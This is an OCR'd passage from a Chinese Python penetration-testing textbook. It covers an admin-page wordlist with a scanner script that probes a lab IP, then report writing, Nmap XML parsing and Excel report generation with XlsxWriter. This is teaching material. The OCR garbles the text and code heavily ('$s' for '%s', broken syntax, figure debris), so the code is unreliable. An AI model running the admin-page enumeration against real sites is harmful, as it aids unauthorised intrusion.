这 个 页 面 不 存在 。 另 外 可 以 使 用 一 个 字典 文件 list.txt， 这 个 字典 文件 中 保存 了 大 量 常见 的 页 
面 名 ， 如 14-13 所 示 。 
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Do] 内 容 L 

1 admin. asp 

2 ad_login. asp 

3 ad_nanage. asp 

4 add_admin. asp 

5 addmember. asp 

6 adduser. asp 

7 adn_login. asp 

9 adnin/adnin. asp 
10 adnin/adnin_login. asp 
12 adnin/index. asp 
13 adnin/login. asp 
14 adnin/nanage. asp 
15 adnin_adnin. asp 
16 adnin_del.asp 
17 adnin_delete. asp 
18 adnin_edit.asp 
19 adnin_index. asp 
20 Adnin_Login. asp 
21 admin_main. asp 
22 admin_pass. asp 
23 adnin_user. asp 
24 adninl. asp 
25 adninadduser. asn 


图 14-13 字典 文件 list.txt 的 内 容 
这 里 编写 的 程序 只 需要 从 字典 中 读 出 一 行 ， 然 后 与 http://192.168.169.133 共同 组 成 一 个 
地 址 ， 例 如 与 第 一 行 组 成 了 http://192.168.169.133/admin.asp。 下 面 给 出 一 个 完整 的 程序 。 


SISISISISISISISISE3 


回回 回 图 图 


图 图 图 图 图 


import urllib2, argparse, sys 
defhost_ test (filename, host): 
file = "list.txt" 
bufsize = 0 
e = open (file, 'a', bufsize) 
print("[*] Reading file %s") % (file) 
with open (filename) as f: 
locations = f.readlines () 
for item in locations: 
target = host + "/" + item 


try: 
request = urllib2.Request (target) 
request.get_method = lambda : 'GET' 
response = urllib2.urlopen (request) 
except: 
print("[-] %s is invalid") % (str (target.rstrip('\n'))) 
response = None 
if response != None: 


print ("[+] %s is valid") % (str(target.rstrip('\n'))) 
details = response.info() 
e.write (str (details)) 


e.close() 
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小 结 


Web 应 用 的 安全 是 近 些 年 来 一 个 极为 热门 的 研究 方向 ，Python 作为 一 门 全 能 型 的 语言 ， 
自然 也 少不了 对 这 个 方面 的 支持 。 本 章 首 先 介 绍 了 HTTP 的 基本 概念 ， 然 后 讲解 了 Python 中 
与 HTTP 相关 的 库 文件 ， 最 后 给 出 了 一 些 针对 HTTP 的 常见 操作 。 

但 是 对 Web 应 用 安全 的 研究 也 是 一 个 十 分 复杂 的 内 容 ， 如 果 要 在 本 书 的 一 个 章节 中 对 其 
进行 详尽 的 介绍 是 无 法 实现 的 ， 这 里 仅 提 到 了 一 些 常见 的 操作 。 第 15 章 就 是 本 书 的 最 后 一 
章 ， 这 一 章 将 会 介绍 如 何以 报告 的 形式 来 展示 渗透 测试 的 成 果 。 


生成 渗透 测试 报 和 1 


到 此 为 止 已 经 对 目标 进行 了 完整 的 渗透 测试 ， 但 是 对 目标 的 攻击 并 不 是 最 终 的 目的 ， 正 
确 的 做 法 应 该 是 将 发 现 的 问题 以 报告 的 形式 提交 给 客户 ， 让 客户 能 够 理解 问题 的 严重 性 ， 并 
对 此 做 出 正确 回应 ， 及 时 进行 改正 ， 这 才 是 我 们 真正 应 该 做 的 。 这 一 切 需要 通过 沟通 才能 完 
成 ， 除 了 与 客户 之 间 的 交流 之 外 ， 还 必须 向 客户 提供 一 份 易于 理解 的 书面 测试 报告 。 

渗透 测试 的 最 后 一 个 也 是 最 为 重要 的 一 个 阶段 就 是 报告 编写 。 作 为 一 个 合格 的 渗透 测试 
人 员 ， 应 该 具备 良好 的 报告 编写 能 力 。 渗 透 测 试 人 员 在 编写 测试 的 时 候 应 该 保证 报告 的 专业 
性 ， 但 是 这 份 报告 最 后 的 阅读 者 往往 是 并 不 具备 专业 领域 知识 的 管理 人 员 ， 因 此 需要 避免 使 
用 过 于 专业 的 术语 ， 并 且 易 于 理解 。 鉴 于 目前 微软 办 公 软 件 的 普及 ， 即 使 是 专业 人 士 也 大 都 
会 采用 Word, Excel 来 编写 渗透 测试 报告 。 另 外 ， 利 用 Python 可 以 便利 地 导入 扫描 和 渗透 的 
结果 ， 从 而 编写 出 优秀 的 报告 。 

本 章 主要 围绕 以 下 三 个 部 分 展开 学 习 。 

(1 ) 渗透 测试 报告 的 相关 理论 。 

(2 ) 使 用 Python 对 XML 文件 进行 处 理 。 

(3 ) 使 用 Python 生成 Excel 格式 的 渗透 报告 。 


令 
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15.1 渗透 测试 报告 的 相关 理论 


15.1.1 编写 渗透 测试 报告 的 目的 

如 果 将 整个 渗透 测试 的 过 程 看 作 是 工厂 中 的 生产 过 程 ， 那么 最 后 的 产品 就 是 渗透 测试 报 
告 。 很 多 初 人 职场 的 工程 师 和 学 生 都 认为 编写 文档 是 一 件 技术 含量 不 高 的 工作 ， 这 其 实 是 一 
个 十 分 错误 的 观点 。 渗 透 测试 人 员 需 要 将 整个 渗透 测试 过 程 中 完成 的 工作 以 书面 报告 的 形式 
整理 出 来 ， 这 份 报告 必须 以 通俗 易 懂 的 语言 全 面 总 结 这 次 测试 过 程 中 的 工作 。 

一 种 比较 糟糕 的 情况 就 是 对 目标 进行 了 大 量 的 渗透 测试 工作 ， 而 且 也 发 现 了 目标 网 络 中 
存在 的 问题 , 但 是 目标 网 络 的 管理 人 员 却 无 法 理解 我 们 的 报告 ,或 者 对 提出 的 问题 没有 产生 
足够 的 重视 ,这 样 其 实 我 们 在 渗透 测试 时 所 花费 的 时 间 和 精力 都 被 浪费 了 。 

因此 ,一 份 合格 的 渗透 测试 报告 应 该 可 以 让 所 有 的 人 员 都 能 够 看 履 ， 而 且 轻 而 易 举 地 发 
现 报告 中 所 指出 问题 的 重要 性 。 这 样 渗透 测试 人 员 就 不 能 只 具备 渗透 技能 ， 对 安全 问题 的 修 
复 能 力 、 表 达能 力也 同样 重要 。 


15.1.2 ”编写 渗透 测试 报告 的 内 容 摘要 

渗透 测试 报告 的 内 容 摘要 其 实 就 是 最 终 报告 的 一 个 概况 总 结 。 这 部 分 内 容 必须 避免 长 篇 
大 论 ， 应 该 以 高 度 精 练 的 方式 来 概述 在 整个 渗透 测试 阶段 的 工作 ， 篇 幅 一 般 不 会 超过 几 个 段 
落 。 另 外 ， 在 描述 时 采用 的 语言 也 应 该 尽量 简单 ， 不 要 使 用 任何 的 技术 术语 ， 侧 重 描述 目前 
目标 中 漏洞 可 能 带 来 的 风险 。 

渗透 测试 的 报告 应 该 以 发 现 的 漏洞 作为 切入 点 ， 结 合用 户 的 实际 安全 需求 来 完成 。 打 个 
比方 ， 如 果 现 在 为 一 家 银行 做 测试 ， 那 么 银行 可 能 最 关注 的 就 是 所 有 客户 的 信息 ， 黑 客 可 能 
会 利用 银行 对 外 发 布 HTTP 服务 的 Web 程序 来 窃取 这 些 信息 。 在 进行 报告 的 编写 过 程 中 就 应 
该 花费 大 量 精力 来 描述 在 测试 过 程 中 所 发 现 的 与 此 相关 的 漏洞 。 如 果 在 测试 过 程 中 没有 发 现 
这 一 类 的 漏洞 ， 就 应 该 明确 地 说 明 这 个 事实 。 

内 容 摘要 中 还 应 该 说 明 为 什么 要 进行 这 次 安全 渗透 测试 。 


15.1.3 ”编写 渗透 测试 报告 包含 的 范围 

当 对 目标 网 络 进行 测试 的 时 候 ， 不 太 可 能 会 遇见 所 有 的 设备 都 存在 问题 的 情形 。 例 如 ， 
对 一 个 单位 的 所 有 服务 器 进行 渗透 测试 时 ， 可 能 只 在 其 中 一 两 台 设 备 发 现 了 问题 。 当 在 编写 
渗透 测试 时 ， 是 将 所 有 服务 器 的 信息 都 写 和 人 报告 中 呢 ， 还 是 只 需要 将 有 问题 的 设备 信息 写 和 人 
报告 中 呢 ? 

和 这 一 点 相 类 似 的 是 ， 在 编写 渗透 测试 报告 的 时 候 ， 是 将 渗透 过 程 中 的 全 部 测试 都 写 人 
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渗透 报告 中 ， 还 是 只 将 发 现 问题 的 测试 写 入 渗透 报告 ? 
实际 上 ， 目 前 对 这 个 问题 并 没有 一 个 权威 的 答案 ， 不 同 的 机 构 或 者 专家 对 此 可 能 会 有 截 
ADRAR, PERAR. 


15.1.4 ”安全 地 交付 这 份 渗透 测试 报告 

渗透 测试 的 最 后 一 个 步骤 就 是 将 编写 好 的 报告 交付 给 客户 。 一 般 来 说 ， 每 一 个 机 构 都 会 
使 用 专业 的 加 密 软 件 。 如 果 你 所 在 的 是 一 个 创业 型 企业 ,没有 购买 这 方面 的 软件 ， 那 么 也 可 
以 使 用 zip 格式 来 对 报告 进行 加 密 。 虽 然 这 样 做 看 起 来 不 是 十 分 专业 ， 但 是 要 比 一 份 明文 的 
报告 好 得 多 。 

这 样 将 加 密 之 后 的 报告 和 秘 钥 分 开 传递 给 客户 。 例 如 ， 可 以 以 电子 邮件 或 者 U 盘 的 形式 
交 给 客户 ， 而 秘 钥 则 以 一 个 更 安全 的 方式 传递 。 


15.1.5 ”渗透 测试 报告 应 包含 的 内 容 

由 于 目前 安全 行业 中 并 没有 一 份 完全 统一 的 标准 ， 这 一 点 给 渗透 测试 从 业 人 员 在 编写 报 
告 时 带 来 了 困难 。 而 那些 刚刚 进入 这 个 行业 的 人 员 可 能 更 会 感到 困惑 ， 到 底 在 一 份 渗透 测试 
报告 中 应 该 包含 哪些 内 容 呢 ? 这 些 内 容 又 是 如 何 组 织 的 呢 ? 

由 于 一 次 渗透 测试 需要 的 时 间 比 较 长 ， 在 此 期 间 完成 了 大 量 的 工作 ， 可 以 使 用 WAPITI 
模型 来 将 这 些 工 作成 果 组 织 在 一 起 。 

WAPITI 模型 一 共 包 括 以 下 6 点 。 

(1) W: 进行 渗透 测试 的 原因 。 

(2 ) A: 在 渗透 测试 过 程 中 使 用 的 方法 。 

(3 ) P: 在 渗透 测试 过 程 中 发 现 的 问题 。 

(4) I: 这 些 发 现 问题 会 给 目标 带 来 的 影响 。 

(5 ) T: 给 目标 提出 改正 的 方案 。 

(6) I: 明确 客户 已 经 清楚 了 解 报告 的 内 容 。 


15.2 处理 XML 文件 


XML 就 是 可 扩展 标记 语言 ， 目 前 这 种 语言 是 各 种 应 用 程序 之 间 进 行 数据 传输 的 最 常用 
的 工具 。XML 元 素 是 XML 文件 内 容 的 基本 单元 。 从 语法 讲 ， 一 个 元 素 包 含 一 个 起 始 标记 、 
一 个 结束 标记 以 及 标记 之 间 的 数据 内 容 。 

XML 元 素 与 HTML 元 素 的 格式 基本 相同 ， 其 格式 如 下 。 

< 标记 名 称 属性 名 1-" 属性 值 1” -> 内 容 </ 标记 名 称 > 
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它 是 由 标签 对 组 成 对 : < port ></ port >。 

标签 可 以 有 属性 : < port portid="25"></ port >; 

标签 对 中 可 以 租 入 数据 : < port >abc</ port >; 

这 里 可 以 使 用 mxl.dom.minidom 模块 来 处 理 XML 文件 ， 所 以 要 先 引 入 。 

文件 对 象 模型 ( Document Object Model, DOM) 是 W3C 组 织 推荐 的 处 理 可 扩展 置 标语 
言 的 标准 编程 接口 。 一 个 DOM 的 解析 器 在 解析 一 个 XML 文档 时 ， 一 次 性 读 取 整 个 文档 ， 
把 文档 中 所 有 元 素 保存 在 内 存 中 的 一 个 树 结构 里 ， 之 后 用 户 可 以 利用 DOM 提供 的 不 同 函数 
来 读 取 或 修改 文档 的 内 容 和 结构 ， 也 可 以 把 修改 过 的 内 容 写 入 XML 文件 。Python 中 用 xml. 
dom.minidom 来 解析 XML 文件 ， 接 下 来 首先 使 用 Nmap 生成 一 份 XML 类 型 的 报告 。 

nmap 192.168.169.132 -oX test .xml 


生成 的 testxml 文件 中 关于 开放 端口 的 状态 采用 了 如 下 格式 。 


<port protocol="tcp" portid="25"><state state="open" reason="syn-ack" reason 
ttl="128"/><service name="smtp" method="table" conf="3"/></port> 


用 xml.dom.minidom 来 解析 这 个 XML 文件 ， 这 个 解析 的 过 程 很 简单 ， 下 面 直接 给 出 一 
个 解析 的 实例 。 
# 引入 所 需要 的 库 文件 


from xml.dom.minidom import parse 

import xml.dom.minidom 

# 使 用 minidom 打开 目标 XML 文档 

DOMTree = xml.dom.minidom.parse("test.xml") 

collection = DOMTree.documentElement 

# 在 集合 中 获取 所 有 所 有 端口 

ports=collection.getElementsByTagName ("port") 

# 打印 每 个 端口 的 详细 信息 

for port in ports: 
print "*****#port*****" 
if port.hasAttribute ("portid"): 

print "Portid : %s" % port.getAttribute ("portid") 

state = port.getElementsByTagName ('state') [0] 
print "The State is: $s" $ state.getAttribute('state') 
service = port.getElementsByTagName ('service') [0] 
print "The Service is: $s" % service.getAttribute ('name') 


执行 结果 如 下 所 示 。 


**2*.*+port***** 
Portid : 25 
The State is: open 


The Service is: smtp 
***ž*ž*žport*žžžž* 


Portid : 80 

The State is: open 
The Service is: http 
**žž*žportřž*ž*ž** 
Portid : 135 

The State is: open 
The Service is: 
*k**2.*kport***** 
Portid : 139 
The State is: open 

The Service is: netbios-ssn 
****ž*žDOrtřžžžž* 

Portid : 443 

The State is: open 

The Service is: https 

太太 大 女友 局 O 工 七 大 太太 太太 

Portid : 445 

The State is: open 

The Service is: microsoft-ds 


msrpc 
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XIsxWriter 模块 是 一 个 生成 Excel 文档 的 Python 模块 。 这 
Excel 文档 (需要 注意 的 是 这 个 模块 匹配 的 是 Excel 2007 ) 。 


的 安装 方法 就 是 使 用 easy_install。 
easy_install XlsxWriter 


首先 使 用 XlsxWriter 编写 一 个 最 简单 的 程序 。 


import xlsxwriter 

workbook = xlsxwriter.Workbook('hello.xlsx') 
worksheet = workbook.add worksheet () 
worksheet.write('Al', 'Hello world') 
workbook.close () 


这 个 程序 的 作用 是 在 单元 格 Al 中 填写 了 “Hello 
”， 运 行 的 结果 如 图 15-1 所 示 。 

很 多 人 容易 将 Excel 中 的 工作 短 (Excel 文档 ) MT 
作 表 和 措 混 ， 注 意 工作 秒 本 身 是 一 个 文档 ,但 是 它 的 作用 
如 同一 个 文件 夹 ， 并 不 直接 保存 内 容 ， 而 是 将 内 容 保存 
在 它 其 中 的 工作 表 里 面 。 这 一 点 和 Word 文档 是 不 同 的 。 
在 XIsxWriter 这 个 模块 中 使 用 workbook 来 对 应 工作 笑 ， 
如 图 15-2 所 示 。 


world 
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个 模块 可 以 生成 十 分 优美 的 
me 最 简单 


d 9 = heloəlsx- Micros... 
Pe a isa sis saaja- ° x 


ESE 


Hello world | 
r De 人 一 


RE 


lo» en lse feo [eo 


| sheet1 RF 0 
Ea 


图 15-1 使 用 XIsxWriter 编写 一 


简单 的 程序 
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每 一 个 工作 短 中 又 包含 很 多 个 工作 表 ， 平 时 看 到 的 一 个 一 个 方 格 组 成 的 页 面 就 是 工作 
表 。 在 XlsxWriter 这 个 模块 中 使 用 worksheet 来 对 应 工作 表 ， 如 图 15-3 所 示 。 


图 15-2 Excel 中 的 工作 簿 图 15-3 Excel 中 的 默认 工作 表 
Excel 最 强大 的 功能 就 是 它 的 数据 处 理 ， 图 表 是 一 种 十 分 直观 的 数据 展示 方法 ， 在 
XlsxWriter 这 个 模块 中 使 用 Chart 来 对 应 图 表 ， 如 图 15-4 所 示 。 


25 


20 


一 9 一 系列 1 


Ü Tp 
123456789101112 


图 15-4 Excel 中 的 图 表 文 件 


workbook, worksheet 和 chart 是 XlsxWriter 中 最 重要 的 三 个 类 。 首 先 介绍 一 个 workbook 
类 ， 这 个 类 主要 有 两 个 作用 ， 一 是 用 来 生成 Excel 文档 ， 二 是 提供 生成 工作 表 的 方法 。 这 个 
类 的 实例 化 需要 一 个 文件 名 作为 参数 ， 返 回 值 为 workbook 对 象 ， 下 面 给 出 了 生成 一 个 名 为 
“hello.xlsx” 文 档 的 方法 。 


workbook = xlsxwriter.Workbook(' hello.xlsx ') 


并 不 能 在 Excel 文档 中 直接 保存 数据 ， 而 是 要 在 这 些 
工作 表 中 保存 数据 。 因 此 ， 接 下 来 要 在 这 个 文档 中 生成 
一 个 用 于 保存 数据 的 工作 表 ， 如 图 15-5 所 示 。 


添加 工作 表 的 函数 为 add worksheet ( [name])， 这 个 图 15-5 {EJH UltraISO 打开 Kali 
Linux 2 的 映像 文件 
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函数 只 需要 一 个 字符 型 参数 ， 表 示 工 作 表 名 。 返 回 值 是 一 个 工作 表 。 

worksheet1l = workbook.add worksheet ("firstworksheet") 

图 15-6 给 出 了 使 用 这 个 代码 创建 好 的 工作 表 “firstworksheet”。 

添加 工作 表 之 后 ， 就 可 以 向 这 个 工作 表 中 添加 数据 。Excel 工作 表 中 的 基本 单位 是 单元 
格 ， 每 个 单元 格 都 是 由 行 和 列表 示 ， 例 如 ， 第 一 个 单元 格 就 是 Al1， 第 二 个 就 是 B1， 如 图 
15-7 所 示 。 


B1 * 
c 
Ed 
" 
H B1 
图 15-6 创建 的 工作 表 “firstworksheet” 图 15-7 B1 单元 格 
向 单元 格 中 添加 数据 的 函数 是 write(row, col, *args)， 其 中 , row 表示 列 标 , col 表示 行 标 ， 


*args 表示 要 写 人 的 参数 ， 不 过 下 面 的 两 种 写法 是 相同 的 。 

worksheet.write(0, 0, 'Hello') 

worksheet.write('Al', 'Hello') 

为 了 使 表格 更 加 美观 ， 可 以 对 单元 格 的 格式 进行 设置 。 可 供 设置 的 内 容 很 多 ， 其 中 包括 
单元 格 文字 的 字体 、 字 号 、 颜 色 、 是 否 加 粗 、 对 齐 方式 以 及 数字 形式 等 。 

XlsxWriter 中 采用 了 预先 定义 格式 的 方式 ， 也 就 是 先 定义 好 单元 格 文字 的 格式 。 

format = workbook.add_format () 

单元 格 的 格式 可 以 保存 到 一 个 变量 format 中 ， 然 后 将 需要 设置 的 属性 进行 调整 ， 例 如 ， 
单元 格 中 的 文字 加 粗 ， 就 可 以 使 用 如 下 语句 。 

format .set_bold() 

在 向 单元 格 中 写 人 数据 的 时 候 ， 就 可 以 应 用 如 下 这 个 格式 了 。 

worksheet .write (0, 0, 'Foo', format) 

首先 来 看 一 下 跟 字体 相关 的 各 种 属性 ， 恰 当 使 用 这 些 属性 可 以 使 文档 十 分 漂亮 。 

(1) 字体 类 型 。 设 置 字体 的 函数 为 set font name(fontname)， 其 中 ，fontname 是 字符 类 
型 。 例如， 将 字体 设置 为 Times New Roman， 如 图 15-8 所 示 。 
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cell format.set font name ("Times New Roman') 


(2) 字号 。 设 置 字 号 的 函数 为 set font size(size)， 这 里 的 字号 是 数字 型 。 例 如 ， 将 字号 
设置 为 “30”"， 如 图 15-9 所 示 。 


format.set font size(30) 


===[ 
OES m-Jië-J%-A-J*-J 


=s 


图 15-8 将 字体 设置 为 Times New Roman 图 15-9 将 字号 设置 为 “30” 


(3) 字体 颜色 。set font color(colon， 这 里 的 字体 颜色 可 以 是 Black、Blue、Cyan、 
Green, Magenta, Red, White, 、Yellow。 例 如 ， 将 字体 颜色 设置 为 “red”。 

format.set_font_color('red') 

(4) 字体 加 粗 。set_bold()， 下 面 的 代码 可 以 将 文字 设置 为 加 粗 。 

format.set_bold() 

(5) 字体 倾斜 。set_italic()， 下 面 的 代码 可 以 将 文字 设置 为 倾斜 。 

format.set_italic() 

(6) 下 画 线 。set_underline(0)， 下 面 的 代码 可 以 为 文字 添加 下 画 线 。 

format.set_underline () 

(7) 删除 线 。set_font_strikeout()， 下 面 的 代码 可 以 为 文字 添加 删除 线 。 

format. set font strikeout() 

(8) 下 标 。set_font_script()， 这 个 函数 的 参数 有 两 个 ，1 表示 上 标 ，2 表示 下 标 。 下 面 的 
代码 可 以 将 文字 设置 为 下 标 。 

format. set font script (2) 


(9) 如 果 单 元 格 的 内 容 是 数字 ， 那么 也 可 以 设置 数值 的 格式 。 不 过 Excel 中 的 数据 格式 
比较 复杂 ， 下 面 给 出 了 一 些 实例 。 


format0l.set num format('0.000') 
worksheet .write(l, 0, 3.1415926, format01) # -> 3.142 


format02.set_num format ('#,##0') 
worksheet.write(2, 0, 1234.56, format02) # -> 1,235 


format03.set_num format ('#,##0.00') 


worksheet.write(3, 0, 1234.56, format03) 


format04.set num format('0.00') 
worksheet .write(4, 0, 49.99, format04) 


format05.set num format('mm/dd/yy') 
worksheet .write(5, 0, 36892.521, format05) 


format06.set num format('mmm d yyyy') 
worksheet .write(6, 0, 36892.521, format06) 


format07.set num format('d mmmm yyyy') 
worksheet .write(7, 0, 36892.521, format07) 
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format08.set num format('dd/mm/yyyy hh:mm AM/PM') 
# -> 01/01/2001 12:30 AM 


worksheet.write(8, 0, 36892.521, format08) 


format09.set_num_format('0 "dollar and" .00 "cents"') 


worksheet.write(9, 0, 1.87, format09) 


# -> 1 dollar and .87 cents 


1,234.56 


49.99 


01/01/01 


Jan 1 2001 


1 January 2001 


< 
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(10) 对 齐 方式 。Excel 中 的 对 齐 操作 有 很 多 ， 这 里 的 对 齐 方式 指 的 是 单元 格 中 文字 相对 


单元 格 的 位 置 。 常 见 的 对 齐 方式 有 居中 (center)、 靠 右 (ight), HE (fill)、 两 端 对 齐 (justify), 
跨 列 居中 (center_across)。 


(11) 垂直 对 齐 方 式 。 包 括 顶 端 对 齐 (top)、 居 中 对 齐 (vcenter)、 底 部 对 齐 (bottom). WN 


端 对 齐 (vjustify )。 


(12 ) 跨 列 居中 。set_center_across()。 
(13) 首 行 缩 进 。set_indent()。 
(14) 背景 色 。set_bg_color()。 
(15) 前 景色 。set_fg_color()。 


(16 ) 添加 图 像 。 如 果 要 向 其 中 添加 图 像 ， 可 以 使 用 insert image(row, col, image[, options]) 


worksheet2.insert image('B20', r'c:\images\python.png') 


(17) 合并 单元 格 。worksheet.merge_range()， 这 个 函数 的 参数 比较 多 。 


merge range (first row, first col, last row, last col, data[, cell format]) 


下 面 利 用 上 面 讲解 过 的 内 容 来 制作 一 个 大 标题 。 


#coding: utf-8 
import xlsxwriter 


workbook = xlsxwriter.Workbook('c:\chart.xlsx') 


worksheet = workbook.add worksheet () 


函数 ， 同 样 这 里 面 的 row 表示 列 标 ，col 表示 行 标 ，image 表示 要 插入 图 像 的 名 称 (需要 图 像 
的 路 径 )。 


worksheetl.insert_image('B10', '../images/python.png') 


282 


D Python 渗透 测试 编程 技术 : 方法 与 实践 


Title format Hl = workbook.add format () 

Title format Hl.set bold() 

Title format Hl.set font size(36) 

Title format Hl.set bg color("gray") 

Title format Hl.set border(1) 

Title format Hl.set font color('white') 

Title format Hl.set align("center") 

worksheet .merge range('Al:J]l', 'Reports', Title format H1) 
workbook.close () 


这 段 代 码 执行 的 结果 如 图 15-10 所 示 。 


图 15-10 应 用 了 格式 的 示例 
利用 这 个 模块 ， 还 可 以 将 渗透 测试 的 结果 以 图 表 的 形式 展示 出 来 ，Excel 中 的 图 表 功 能 


极为 强大 ， 但 是 类 型 就 有 很 多 种 。 这 个 模块 中 的 chart 就 对 应 着 Excel 中 的 图 表 ， 常 见 的 类 型 
如 下 所 示 。 


(1 ) area: 面积 图 。 

(2 ) bar: 条 形 图 。 

(3) column: 列 样式 柱 形 图 。 

(4) line: 线形 图 。 

(5) pie: 饼 图 。 

(6) doughnut: 圆 环 图 。 

(7) scatter: 分 散 式 图 。 

(8) stock: 股价 图 。 

(9 ) radar: 雷达 图 。 

添加 图 表 的 函数 为 insert_chart()， 向 一 个 工作 表 中 添加 图 表 的 命令 如 下 所 示 。 
insert chart (row, col, chart[, options]) 

下 面 给 出 了 实现 插入 一 个 图 表 的 详细 代码 。 
import xlsxwriter 

workbook = xlsxwriter.Workbook('chart.xlsx') 
worksheet = workbook.add worksheet () 


# 创建 一 个 图 表 对 象 


chart = workbook.add chart(('type': 'column'}) 
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+ 向 工作 表 中 添加 一 些 数据 


data = [ 
tD, 2 2, &, S] 
[2, 4; 6, 8, 10], 
[3, 6; 9; 12, . 15] 


] 

worksheet.write column('Al', data[0]) 
worksheet.write_column ('B1', data[1]) 
worksheet.write_column ('C1', data[2]) 


+ 添加 数据 序列 

chart.add series ({'values': '=Sheet1!$A$1:SA$5')) 
chart.add series ({'values': '=Sheet1!$B$1:S$B$5')) 
chart.add_series(('values': '=Sheet1!$C$1:$C$5')) 


+ 将 图 表 插入 到 工作 表 中 
worksheet.insert_chart('A7', chart) 
workbook.close () 


这 段 代码 执行 之 后 的 结果 如 图 15-11 所 示 。 


Ca n. L. Lu I. uu. U u u u. Uu u l: 


图 15-11 生成 的 图 表 文 件 


Excel 格式 的 内 容 很 容易 转换 为 其 他 的 格式 ， 例 如 PDF, HTML 等 格式 。 在 完成 了 整个 
渗透 测试 报告 之 后 ， 就 可 以 将 其 转换 为 需要 的 格式 。 


小 结 


本 章 中 介绍 了 渗透 测试 报告 的 编写 规范 与 包含 的 内 容 。 并 介绍 了 如 何 使 用 Python 来 编 
写 测试 报告 。 虽 然 说 渗透 的 过 程 可 能 很 激动 人 心 ， 但 是 最 后 的 成 果 却 要 以 文档 的 形式 展示 给 
客户 。 如 果 你 希望 成 为 一 名 合格 的 渗透 测试 专家 ,那么 应 该 具备 优秀 的 报告 撰写 能 力 。 

本 章 是 全 书 的 最 后 部 分 ， 全 书 的 15 章 内 容 完整 介绍 了 渗透 测试 工作 的 全 部 流程 。 感谢 
你 阅读 完 本 书 ， 也 希望 这 本 书 能 带领 你 走 上 渗透 测试 专家 的 道路 。 


